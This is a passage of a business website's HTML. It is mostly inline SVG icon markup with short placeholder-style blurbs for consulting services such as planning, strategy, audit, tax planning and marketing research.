		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Consulting</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Planning</a></h5>				<p>We’ve beven a strategy thought leader for nearly five decades</p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Strategy</a></h5>				<p>We’ve been a strategy tmhought leader for nearly five decades</p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Support</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled</p>			
        			<a href="#"class="link-details"> Explore More </a>
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Audit and Assurance</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Gross Tax Planning</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Marketing Research</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Оrganizational Audit</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
